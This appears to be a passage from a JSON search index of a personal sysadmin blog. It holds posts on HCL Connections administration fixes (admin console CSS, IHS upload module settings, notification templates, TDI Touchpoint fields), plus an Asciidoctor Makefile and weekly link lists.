$ADMIN_PORTAL::/usr/share/nginx/html/css/index.css index.css .Change css and replace inline-flex with flex\nsed -i -e \u0026#39;s/inline-flex/flex/g\u0026#39; index.css .Create ConfigMap\nkubectl create configmap cnxadmin-fix --from-file=index.css Now we have to mount the configmap into the admin-portal deployment to make this change permanent.\nkubectl edit deployment admin-portal -n connections .Search for volumes and add the ConfigMap\nvolumes: - name: redis-secret-vol secret: defaultMode: 420 secretName: redis-secret - configMap:\t# Add this and the next 3 lines after the redis-secret defaultMode: 420 name: cnxadmin-fix name: cnxadmin-fix Keep the file open and search for volumeMounts\nvolumeMounts: - mountPath: /etc/redis/redis-secret name: redis-secret-vol - mountPath: /usr/share/nginx/html/css # Mount the configmap to the original path name: cnxadmin-fix Now save the file and the pod will restart automatically. This will fix the menu problem with Chromiumbased browsers, the menu is visible, but still little bit too high. Feel free to fix this too.\n/cnxadmin/ fixed One more issue with the Administration Console - Aha Idea The Administration Console loads css and fonts from external urls.\n\u0026lt;link rel=\u0026#34;stylesheet\u0026#34; href=\u0026#34;//cdn.rawgit.com/necolas/normalize.css/master/normalize.css\u0026#34;\u0026gt; \u0026lt;link rel=\u0026#34;stylesheet\u0026#34; href=\u0026#34;https://fonts.googleapis.com/css?family=Roboto:300,400,500,700\u0026amp;amp;display=swap\u0026#34;\u0026gt; \u0026lt;link rel=\u0026#34;stylesheet\u0026#34; href=\u0026#34;https://fonts.googleapis.com/icon?family=Material+Icons\u0026#34;\u0026gt; That\u0026rsquo;s an issue in some environments and I think it is better and more secure to have all elements of On-Premises Connections on the Connections servers. I added a AHA Idea to get this fixed.\n","excerpt":"\u003cp\u003eConnections 7 has a new Administration Console to access Communities Template administration and Mobile Administration.\u003c/p\u003e\n\u003cp\u003eThe Administration Console can be reached on https://cnx-hostname/cnxadmin/. The \u003ccode\u003e/\u003c/code\u003e at the end is important, because the ingress rule just forwards \u003ccode\u003e/cnxadmin/(.*)\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eOn Firefox you get this view:\u003c/p\u003e\n\u003cfigure\u003e\u003ca href=\"/images/2021/cnxadmin.png\"\u003e\u003cimg src=\"/images/2021/cnxadmin.png\"\u003e\u003c/a\u003e\u003cfigcaption\u003e\n \u003ch4\u003e/cnxadmin/ panel\u003c/h4\u003e\n \u003c/figcaption\u003e\n\u003c/figure\u003e\n\n\u003cp\u003eWith Chrome (Chromium, Edge) the left menu is missing. There is a \u003ccode\u003edisplay: inline-flex\u003c/code\u003e for some elements in \u003ccode\u003eindex.css\u003c/code\u003e of the Administration Console.\u003c/p\u003e\n\u003cp\u003eSo how can we inject a repaired \u003ccode\u003ecss\u003c/code\u003e file into the container?\u003c/p\u003e\n\u003ch2 id=\"configmap\"\u003eConfigMap \u003ca href=\"#configmap\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eOne quick and dirty way is to use a configMap with the adjusted stylesheet. So I did the following:\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/cnxadmin-panel-on-chrome/","title":"Repair Administration Panel of Connections 7 for Chromium-based Browsers"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ibm-http-server/","title":"IBM HTTP Server"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ihs/","title":"IHS"},{"body":"The last days I analyzed an issue, that file uploads to HCL Connections via IBM HTTPServer stopped working on a fresh installed 6.5CR1.\nToday I configured a Connections 7 and tried with it. I think that the official documentation is old in some important parts for the upload configuration.\nFirst of all my IBM HTTPServer 8.5.5.18 is not 32-bit like the documentation tells us:\nThe IBM HTTP Server process is 32-bits in both cases and requires 32-bit modules.\nWhen I check my installed HTTP Server (which was installed with the official Ansible scripts), I see this:\n[root@cnx7 upload]# /opt/IBM/HTTPServer/bin/apachectl -V Server version: IBM_HTTP_Server/8.5.5.18 (Unix) Apache version: 2.2.8 (with additional fixes) Server built: Jun 24 2020 16:56:21 Build level: IHS85/webIHS2025.01 Server\u0026#39;s Module Magic Number: 20051115:23 Server loaded: APR 1.2.12, APR-Util 1.2.12 Compiled using: APR 1.2.12, APR-Util 1.2.12 Architecture: 64-bit Server MPM: Worker threaded: yes (fixed thread count) forked: yes (variable process count) So when you use the 32-Bit one, you get following message during HTTPServer start:\n[Mon Apr 26 07:57:52 2021] [warn] module rewrite_module is already loaded, skipping httpd: Syntax error on line 1059 of /opt/IBM/HTTPServer/conf/httpd.conf: Syntax error on line 2 of /opt/IBM/HTTPServer/conf/httpd-upload.conf: Cannot load modules/mod_ibm_u server: /opt/IBM/HTTPServer/modules/mod_ibm_upload.so: wrong ELF class: ELFCLASS32 The Ansible roles do not configure IHS Upload, this needs to be done manually.\nSo now we know that we need a 64 bit module and copy it to IHS.\n[root@cnx7 upload]# ls -al /opt/HCL/Connections/ihs/mod_ibm_upload/ total 12 drwxr-xr-x. 12 root root 273 Apr 26 14:28 . drwxr-xr-x. 4 root root 58 Apr 22 10:37 .. drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.aix.ppc32 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.aix.ppc64 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.amd64 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.ia32 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.ppc32 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.ppc64 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.s390 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.s390_64 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.linux.x86_64 drwxr-xr-x. 2 root root 31 Apr 22 10:37 ihs.win.ia32 -rw-r--r--. 1 root root 2101 Nov 23 14:54 MD5 -rw-r--r--. 1 root root 100 Nov 23 14:54 README -rw-r--r--. 1 root root 151 Nov 23 14:54 README.txt Hmm, I have no idea why there are two versions for 64-bit Linux!\nSize and checksum are different\n[root@cnx7 upload]# sha256sum /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.amd64/mod_ibm_upload.so 13a23a23bbd19d34c99e0cdefea30f09e0ecf14a22c5bc3399b6f7f9908fa7ec /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.amd64/mod_ibm_upload.so [root@cnx7 upload]# sha256sum /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.x86_64/mod_ibm_upload.so 0057b7e0ca816891f98f715d62cb41cdccaa5cfee5718a3465b2f005e95aed24 /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.x86_64/mod_ibm_upload.so [root@cnx7 upload]# ls -al /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.x86_64/mod_ibm_upload.so -rw-r--r--. 1 root root 36360 Nov 23 14:54 /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.x86_64/mod_ibm_upload.so [root@cnx7 upload]# ls -al /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.amd64/mod_ibm_upload.so -rw-r--r--. 1 root root 36520 Nov 23 14:54 /opt/HCL/Connections/ihs/mod_ibm_upload/ihs.linux.amd64/mod_ibm_upload.so Ok, so now everything is in place, I used the x86_64 version of the module and copied it to /opt/IBM/HTTPServer/modules, then I copied the config from the documentation for the files application to my virtualhost and set the parameters for uploads in\nfiles-config.xml\n... \u0026lt;file\u0026gt; ... \u0026lt;media maximumSizeInKb=\u0026#34;2048000\u0026#34;/\u0026gt; ... \u0026lt;/file\u0026gt; \u0026lt;api\u0026gt; ... \u0026lt;simpleUploadAPI maximumSizeInKb=\u0026#34;128000\u0026#34;\u0026gt; \u0026lt;organization estimatedBytesInSeconds=\u0026#34;2097152\u0026#34; id=\u0026#34;admin_replace\u0026#34; maxConcurrenceRequests=\u0026#34;50\u0026#34; maximumSizeInKb=\u0026#34;128000\u0026#34;/\u0026gt; \u0026lt;/simpleUploadAPI\u0026gt; ... \u0026lt;/api\u0026gt; ... \u0026lt;upload\u0026gt; \u0026lt;modIBMUpload enabled=\u0026#34;true\u0026#34;/\u0026gt; \u0026lt;/upload\u0026gt; Set the maximum upload size for single files\nUse the simpleUploadAPI (direct through Websphere) until 128MB\nSame for the organisation 128MB uses WebSphere\nUpload through IHS enabled (default)\nAfter Node synchronization and restart of HTTP and Applicationserver I found following:\nUploads up to 128 MB worked\nUploads from 128 MB to 500 MB were uploaded through IHS (I found different user in the files uploads)\nUploads larger 500 MB stuck at around 500 MB and did not finish.\nThe IHS error_log showed following:\n[Mon Apr 26 13:34:38 2021] [error] [client 10.0.11.1:44186] Error: resumable upload disabled but Content-Range header used, referer: https://cnx7.stoeps.internal/files/app I searched for more configuration settings, more details to the upload module, but couldn’t find anything.\nI was pretty sure that there is a configuration option to enable the resumable upload, but couldn’t find it on any IBM or HCL page.\nSo I tried with strings and Ghidra :\nstrings modules/mod_ibm_upload.so | grep resum ... resumable upload disabled but Content-Range header used Non-resumable upload has been canceled. part-complete;resumable;authenticate On|Off - Enable/disable (default) resumable upload resumable_disabled complete;resumable;forward complete;resumable;phase2 cmd_ibmuploadactivateresumable So there is an option to configure resumable uploads.\nI opened the mod_ibm_upload.so with ghidra and there I found:\nThere are configuration parameter to enable resumable uploads and a size limit where only one part is uploaded. So in my opinion the IBMUploadMinimumPartSize is default 500MB and IBMUploadActivateResumable is Off by default. I never had to use this in 6.0, so I’m pretty sure one of these defaults changed in the last versions (6.5 or 6.5CR1), or the files application forces it now.\nSo I changed the config in httpd.conf to:\n\u0026lt;Location \u0026#34;/ihs/files\u0026#34;\u0026gt; IBMUploadHandler On SetHandler ibm_upload_handler IBMUploadBaseStore \u0026#34;/opt/IBM/SharedArea/files/upload/files\u0026#34; IBMUploadMethods POST,PUT IBMUploadURLPrefix /ihs IBMUploadActivateResumable On \u0026lt;/Location\u0026gt; After restarting the IBM HTTPServer, my files \u0026gt; 500MB uploaded without any issue!\nThe upload module can be used only when WebSphere Application Server is not run as user root. Otherwise, file permissions prevent the application server and the IBM HTTP Server from exchanging files. For security reasons, do not run the application server as root, but if that is not an option, then large files still can be uploaded. If WebSphere Application Server is run as root, consider making the following change to the maximumSizeInKb property for thesimpleUploadAPI file.\nI think running WebSphere as a non-root user is best practise, but for example the Ansible scripts install them for root in the moment. So when you use root for WebSphere, have a look at setfacl and add the http server user to your files/upload directory, so IHS is allowed to upload to that folders.\n","excerpt":"\u003cp\u003eThe last days I analyzed an issue, that file uploads to HCL Connections via IBM HTTPServer stopped working on a fresh installed 6.5CR1.\u003c/p\u003e\n\u003cp\u003eToday I configured a Connections 7 and tried with it.\nI think that the \u003ca href=\"https://help.hcltechsw.com/connections/v7/admin/install/t_install_post_files_uploads.html?hl=upload\" target=\"_blank\"\u003eofficial documentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is old in some important parts for the upload configuration.\u003c/p\u003e\n\u003cp\u003eFirst of all my IBM HTTPServer 8.5.5.18 is not 32-bit like the documentation tells us:\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/cnx-file-upload-through-ihs/","title":"Upload Files via IBM HTTPServer (mod_ibm_upload) to HCL Connections"},{"body":"Since IBM Connections 6.0CR4 we can use a new newsletter format which needs still (now with HCL Connections 7) be activated separately in LotusConnections-config/notification-config.xml.\nToday some users asked how they can add other users to their private communities (visible in Community catalog) without manually adding them. As we investigated the question I had a look at the old notification format.\nSo there a community owner got following e-mail when a user requested to join:\nMail notification for community owner So he could directly add the requesting user to the community.\nNow we switched to the new v2 format and the mail looks like this:\nMail notification for community owner in version 2 So the \u0026ldquo;Add Member\u0026rdquo; link disappeared. So what happens when we use \u0026ldquo;Open\u0026rdquo;? Yes it opens the community and I can\u0026rsquo;t see any link or option where I can answer these requests within the community. This was the reason for the users question, because they added the requesters manually with \u0026ldquo;Add member\u0026rdquo;.\nWhich other options does the user have to add the requesting members?\nNotification Bell Notification about user requesting community membership There they get the information about the request, but clicking on the notification opens the Community and as we already know: you can\u0026rsquo;t see the request there.\nAction Required The only way to say and click the \u0026ldquo;Add member\u0026rdquo; link is \u0026ldquo;Action Required\u0026rdquo; in the old Homepage (sorry, but I haven\u0026rsquo;t deployed Orient Me until now, so I don\u0026rsquo;t know if you see it there).\nAction required Workaround So how can we get the link \u0026ldquo;Add Member\u0026rdquo; into the notification email again?\nLotusConnections-config/notifications_v2/communities/requestToJoinMail.ftl 27 28 29 30 31 32 33 34 35 \u0026lt;#-- Default \u0026#39;Open\u0026#39; Action --\u0026gt; \u0026lt;#assign defaultAction = comUrlUtil.linkifyContainer(community.url, comUtil.resource(\u0026#39;OPEN_LINK_TEXT\u0026#39;), {}, comStyleUtil.actionArgs) /\u0026gt; \u0026lt;#-- Actions --\u0026gt; \u0026lt;#assign actions = [ defaultAction ] /\u0026gt; \u0026lt;#-- Deprecated Actions --\u0026gt; \u0026lt;#-- comUrlUtil.linkifyContainer(community.url, comUtil.resource(\u0026#34;email.open.community\u0026#34;)) --\u0026gt; \u0026lt;#-- comUrlUtil.linkifySpecial(comUrlUtil.LINK_ID.COMMUNITIES.MEMBERS, community.members.url, comUtil.resource(\u0026#34;email.add.this.person\u0026#34;)) --\u0026gt; Deprecated Action \u0026ldquo;email.add.this.person\u0026rdquo; let\u0026rsquo;s check this\n27 28 29 30 31 32 33 34 35 36 37 \u0026lt;#-- Default \u0026#39;Open\u0026#39; Action --\u0026gt; \u0026lt;#assign defaultAction = comUrlUtil.linkifyContainer(community.url, comUtil.resource(\u0026#39;OPEN_LINK_TEXT\u0026#39;), {}, comStyleUtil.actionArgs) /\u0026gt; \u0026lt;#-- Actions --\u0026gt; \u0026lt;#assign actions = [ comUrlUtil.linkifySpecial(comUrlUtil.LINK_ID.COMMUNITIES.MEMBERS, community.members.url, comUtil.resource(\u0026#34;email.add.this.person\u0026#34;), comStyleUtil.actionArgs) defaultAction ] /\u0026gt; \u0026lt;#-- Deprecated Actions --\u0026gt; \u0026lt;#-- comUrlUtil.linkifyContainer(community.url, comUtil.resource(\u0026#34;email.open.community\u0026#34;)) --\u0026gt; \u0026lt;#-- comUrlUtil.linkifySpecial(comUrlUtil.LINK_ID.COMMUNITIES.MEMBERS, community.members.url, comUtil.resource(\u0026#34;email.add.this.person\u0026#34;)) --\u0026gt; Copy the line to the actions, remove the comment signs and add , comStyleUtil.actionArgs) into the function, this adds the same styles as for \u0026ldquo;Open\u0026rdquo;\nWhen we synchronize the nodes and restart the news application we get following notification:\nCustomized newsletter with direct action So we got back some usability, but in my opinion I miss a view in each Community to see the \u0026ldquo;Join Requests\u0026rdquo; like the view \u0026ldquo;Invitations\u0026rdquo; in the members\u0026rsquo; widget.\nThere is already an enhancement request / idea in the Product Ideas Portal for HCL Connections .\nCustomized newsletter with direct action Summary I made all tests with HCL Connections 7 installed with Connections-Automation Ansible repository . I doublechecked and the error/missing link appeared already with Connections 6.5 (no older version to check).\n","excerpt":"\u003cp\u003eSince IBM Connections 6.0CR4 we can use a new newsletter format which needs still (now with HCL Connections 7) be activated separately in \u003ccode\u003eLotusConnections-config/notification-config.xml\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eToday some users asked how they can add other users to their private communities (visible in Community catalog) without manually adding them.\nAs we investigated the question I had a look at the old notification format.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/newsletter_v2/","title":"HCL Connections Newsletter v2 and Join Community requests"},{"body":"Still no traveling or conferences possible, so I recorded one video for OpenNTF , which seems to have a color problem in the end. Hope it is still useful to start with Ansible.\nOpenNTF Introduction to Ansible for Newbies ","excerpt":"\u003cp\u003eStill no traveling or conferences possible, so I recorded one video for \u003ca href=\"https://www.openntf.org\" target=\"_blank\"\u003eOpenNTF \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which seems to have a color problem in the end. Hope it is still useful to start with Ansible.\u003c/p\u003e\n\u003ch2 id=\"openntf\"\u003eOpenNTF \u003ca href=\"#openntf\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://youtu.be/dQcN7lHvj94\" target=\"_blank\"\u003eIntroduction to Ansible for Newbies \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \n \u003ci class=\"las la-video la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2021/","title":"Talks 2021"},{"body":"Since the update to the new HCL Connections Community Card-Based Overview (Connections 6.0 CR4) I search for a way to hide the button \u0026ldquo;Create Community\u0026rdquo; from users without the role \u0026ldquo;Community-Creator\u0026rdquo;. This was always possible in the earlier versions of Connections, but the button was shown always since the update.\nDuring the year I mostly forgot about it, but yesterday I opened a case with HCL Connections Support and got immediatly following answer:\nThere is a new gatekeeper flag, CATALOG_CARD_UPDATED, which was introduced in IC6.0CR5 to help enhance the community card based view. This will need to be set to false to address this issue. You can perform the below steps to address this.\n(1) Login to the below Connections url as the user mapped to the admin role for the Common application.\nYou can check the user mapped to this role from WAS console, Apps \u0026gt; Common \u0026gt; Security role to user/group mapping \u0026gt; admin\nhttps://\u0026lt;your_connections_server\u0026gt;/connections/config/highway.main.gatekeeper.tiles[]\n(2) Locate the CATALOG_CARD_UPDATED setting and change it from true to false.\n(3) Save the setting\n(4) Restart the Communities application\nHCL Support To make it short, this works perfectly as described. Now the button is not visible for users without the community-creator role.\nHCL is planning a technote on this, I will update the post and add the url when it is available. Thanks to HCL for the fast solution and that I\u0026rsquo;m allowed to publish it already.\nAfaik changing settings in /connections/config should only be made after advice from Support. Other changes are unsupported.\nUpdate from 2021-11-18 Please check Hiding the Create Community button 2nd for the latest updates on the usage of CATALOG_CARD_UPDATED.\n","excerpt":"\u003cp\u003eSince the update to the new \u003ca href=\"https://help.hcltechsw.com/connections/v6/user/communities/t_com_search.html\" target=\"_blank\"\u003eHCL Connections Community Card-Based Overview (Connections 6.0 CR4) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I search for a way to hide the button \u0026ldquo;Create Community\u0026rdquo; from users without the role \u0026ldquo;Community-Creator\u0026rdquo;.\nThis was always possible in the earlier versions of Connections, but the button was shown always since the update.\u003c/p\u003e\n\u003cp\u003eDuring the year I mostly forgot about it, but yesterday I opened a case with HCL Connections Support and got immediatly following answer:\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/community_create_button/","title":"Show Community Create Button only to users with role \"community-creator\""},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/asciidoctor/","title":"Asciidoctor"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/make/","title":"Make"},{"body":"I write most of my documents (blog posts, documentation, recipes and so on) with Asciidoctor . Everything is organized in Git repositories.\nDuring GPN 19 (Gulaschprogrammiernacht) I showed how to build html and pdf with a Gitlab CI/CD pipeline . That’s quite handy, but lots of documents I build, I just need locally.\nSo today I played with WSL2 and a Makefile to build all Asciidoctor files in a directory.\nCommandline to make pdf\nasciidoctor-pdf source.adoc -o build/source.pdf This builds a pdf in the directory build, but how can we create a pdf of some files?\nMakefile\ndocs = $(wildcard *.adoc) pdfs = $(docs:.adoc=.pdf) all: $(pdfs) .PHONY: all # Call asciidoctor to generate $@ from $^ %.pdf: %.adoc asciidoctor-pdf $^ -o build/$@ Wildcard of all files with extension adoc in this directory\nMap .pdf instead of .adoc\nRun on all targets\n$@ is the PDF-File,\n$^ is the Source\nSo just running make will create all documents converted in pdf.\nExtend the Makefile Create all documents converted to html and pdf in extra folders. Add commandline option variable.\nMakefile\ndocs := $(wildcard *.adoc) pdfs := $(docs:.adoc=.pdf) htmls := $(docs:.adoc=.html) options := -a toc -a toclevels=\u0026#34;1\u0026#34; all: html pdf pdf: $(pdfs) html: $(htmls) .PHONY: all pdf html # Call asciidoctor to generate $@ from $^ %.pdf: %.adoc asciidoctor-pdf $^ $(options) -o build/pdf/$@ %.html: %.adoc asciidoctor $^ $(options) -o build/html/$@ So now running make creates html and pdf targets.\nYou can use this Makefile on Linux, Mac OS or Windows (with WSL) to convert a large scale of Asciidoctor files to your target.\n","excerpt":"\u003cp\u003eI write most of my documents (blog posts, documentation, recipes and so on) with \u003ca href=\"https://asciidoctor.org\" target=\"_blank\"\u003eAsciidoctor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nEverything is organized in Git repositories.\u003c/p\u003e\n\u003cp\u003eDuring \u003ca href=\"https://entropia.de/GPN19\" target=\"_blank\"\u003eGPN 19 (Gulaschprogrammiernacht) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I showed how to build html and pdf with a \u003ca href=\"https://gitlab.com/stoeps/gpn19-documentation\" target=\"_blank\"\u003eGitlab CI/CD pipeline \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nThat’s quite handy, but lots of documents I build, I just need locally.\u003c/p\u003e\n\u003cp\u003eSo today I played with WSL2 and a Makefile to build all Asciidoctor files in a directory.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/makefile_for_adoc/","title":"Makefile to process all Asciidoctor files in a directory"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/markup/","title":"Markup"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/touchpoint/","title":"Touchpoint"},{"body":"Some weeks ago I wrote about an workaround to prevent TDI from deleting the touchpoint status in HCL Connections .\nDuring some research on TDI I found Mapping fields manually in the HCL Connections documentations. This document describes how to add additional fields to the TDI synchronisation. On point 11 I found something new for me. You can add additional fields and then add the content with an Javascript function for example.\nThen TDI does not make an LDAP call to get the attribute from there, instead it uses the function. So an additional workaround for the Touchpoint state problem is to add the five fields defined in conf/LotusConnections-conf/tdi-profiles-config.xml to map_dbrepos_from_source.properties and set it to null. Setting attributes to null does not delete the content in the database, but just does nothing (no update, no creation).\nExample: add this to the end of your map_dbrepos_from_source.properties\nextattr.recommendedTags=null extattr.departmentKey=null extattr.privacyAndGuidelines=null extattr.touchpointState=null extattr.touchpointSession=null That’s way easier than commenting out the field definitions and if you ever need to set the fields, you can just add the attribute or function to map_dbrepos_from_source.properties.\nHave a look at the update from 17.08.2022 some lines below, this will fix the issue with only small adjustments.\n## Update 10.05.2021\nI’m really sorry, but this workaround seems not to work as expected.\nSo the best way, that the touchpointState is not overwritten on each TDI run is to comment out the fields in tdisol/conf/LotusConnections-config/profiles-types.xml and tdisol/conf/LotusConnections-config/TDI-LotusConnections-config.xml!\nUpdate 17.08.2022 With Connections 7.0 CFix.70.2206 the issue is still not fixed! So each time when sync_all_dns.sh is running and a user has touchpointState set in EMPINST.PROFILE_EXTENSIONS it gets deleted. I have no environment, where the touchpointState is written or read from LDAP.\nAs I wrote in the original article you can uncomment the lines in conf/LotusConnections-config/tdi-profiles-config.xml, but then you need to remove the field definition in conf/LotusConnections-config/profiles-types.xml too.\nFrom my point of view the fastest fix for this is to remove the sourceKey from tdi-profiles-config.xml:\nOriginal definition:\n38 39 40 41 42 \u0026lt;simpleAttribute extensionId=\u0026#34;recommendedTags\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;recommendedTags\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;departmentKey\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;departmentKey\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;privacyAndGuidelines\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;privacyAndGuidelines\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;touchpointState\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;touchpointState\u0026#34; /\u0026gt; \u0026lt;richtextAttribute extensionId=\u0026#34;touchpointSession\u0026#34; maxBytes=\u0026#34;1000000\u0026#34; sourceKey=\u0026#34;touchpointSession\u0026#34; /\u0026gt; Change to:\n35 36 37 38 39 40 41 42 \u0026lt;!-- These extension attributes are required by the \u0026#39;Touchpoint\u0026#39; component --\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;recommendedTags\u0026#34; length=\u0026#34;256\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;departmentKey\u0026#34; length=\u0026#34;256\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;privacyAndGuidelines\u0026#34; length=\u0026#34;256\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;touchpointState\u0026#34; length=\u0026#34;256\u0026#34; /\u0026gt; \u0026lt;richtextAttribute extensionId=\u0026#34;touchpointSession\u0026#34; maxBytes=\u0026#34;1000000\u0026#34; /\u0026gt; This allows the field in profiles, but does not read the state from LDAP. As I have node of the five attributes in LDAP, I removed the sourceKey from all attribute definitions.\n","excerpt":"\u003cp\u003eSome weeks ago I wrote about an \u003ca href=\"/posts/2020/touchpointinhclcnx/\"\u003eworkaround to prevent TDI from deleting the touchpoint status in HCL Connections\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eDuring some research on TDI I found \u003ca href=\"https://help.hcltechsw.com/connections/v6/admin/install/t_prof_tdi_mapfields.html?hl=extattr\" target=\"_blank\"\u003eMapping fields manually \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in the HCL Connections documentations.\nThis document describes how to add additional fields to the TDI synchronisation.\nOn point 11 I found something new for me. You can add additional fields and then add the content with an Javascript function for example.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/touchpointupdate/","title":"Update on the Touchpoint workaround (Updated)"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/2020/","title":"2020"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/linkdump/","title":"Linkdump"},{"body":"Last week I didn\u0026rsquo;t find very useful links to read or articles to share. This week I read more books, so a recommendation for a book this week and two articles with awk basics.\nhttps://www.packtpub.com/product/the-kubernetes-workshop/9781838820756[The Kubernetes Workshop icon:external-link[], window=_blank]:: Still preparing for CKA, so I read a lot around Kubernetes. This book is brand new and the first chapters are already useful. I think it\u0026rsquo;s more detailled than the books I read about Kubernetes before.\nhttps://blog.intigriti.com/2020/10/28/bug-bytes-94-breaking-symfony-apps-why-cyber-security-is-so-hard-to-learn-how-best-to-approach-it/[Bug Bytes #94 - Breaking Symfony apps, Why Cyber Security is so hard to learn \u0026amp; how best to approach it - Intigriti icon:external-link[], window=_blank]:: Again a great collection of things worth reading all around bug bounty and pentesting.\nhttps://youtu.be/-bcWZQCLk_4[Derbycon - The Unintended Risks of Trusting Active Directory icon:external-link[], window=_blank]:: This time a video, I haven\u0026rsquo;t watched it completly until now, but I scrolled through the slide deck and think it is worth watching.\nhttps://jemma.dev/blog/awk-part-2[awk : END { \u0026hellip; icon:external-link[], window=_blank]:: If you’ve already read my first post about awk, thanks for reading this one too! If not, that’s probably a better place to start.\nhttps://jemma.dev/blog/awk-part-1[awk : BEGIN { \u0026hellip; icon:external-link[], window=_blank]:: The other day, I was watching Bryan Cantrill’s 2018 talk, Rust, and Other Interesting Things, and he made an offhanded comment while discussing values of different programming languages and communities. He said, “If you get the awk programming language manual…you’ll read it in about two hours and then you’re done. That’s it. You know all of awk.”\n","excerpt":"\u003cp\u003eLast week I didn\u0026rsquo;t find very useful links to read or articles to share. This week I read more books, so a recommendation for a book this week and two articles with \u003ccode\u003eawk\u003c/code\u003e basics.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://www.packtpub.com/product/the-kubernetes-workshop/9781838820756[The\" target=\"_blank\"\u003ehttps://www.packtpub.com/product/the-kubernetes-workshop/9781838820756[The \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Kubernetes Workshop   icon:external-link[], window=_blank]:: Still preparing for CKA, so I read a lot around Kubernetes. This book is brand new and the first chapters are already useful. I think it\u0026rsquo;s more detailled than the books I read about Kubernetes before.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/linkdump_44_2020/","title":"Linkdump Week 44 / 2020"},{"body":"https://mkaz.blog/working-with-vim/vimwiki/[VimWiki – Working with Vim – mkaz.blog icon:external-link[], window=_blank]:: I switched for daily notes and diary entries to Vimwiki. I like the fast access and combine it with gollum to display in the browser. In the article you find shortcuts and tipps for working with the todo function.\nhttps://cloudberry.engineering/article/dockerfile-security-best-practices/[Dockerfile Security Best Practices - Cloudberry Engineering icon:external-link[], window=_blank]:: Container security is a broad problem space and there are many low hanging fruits one can harvest to mitigate risks. A good starting point is to follow some rules when writing Dockerfiles.\nhttps://www.elastic.co/blog/how-many-shards-should-i-have-in-my-elasticsearch-cluster[How many shards should I have in my Elasticsearch cluster? icon:external-link[], window=_blank]:: If you are looking for practical guidelines around how many indices and shards to have in your cluster, this blog post will help you avoid common pitfalls.\nhttps://alvinalexander.com//unix/edu/examples/grep.shtml[A BIG collection of Unix/Linux ‘grep’ command examples icon:external-link[], window=_blank]:: Some very useful examples for grep\nhttps://blog.intigriti.com/2020/10/14/bug-bytes-92-pwning-apple-for-three-months-xss-in-vuejs-hacking-salesforce-lightning-unicode-by%CD%A5tes/[Bug Bytes #92 - Pwning Apple for three months, XSS in VueJS, Hacking Salesforce Lightning \u0026amp; Unicode byͥtes - Intigriti icon:external-link[], window=_blank]:: Bug Bytes is a weekly newsletter 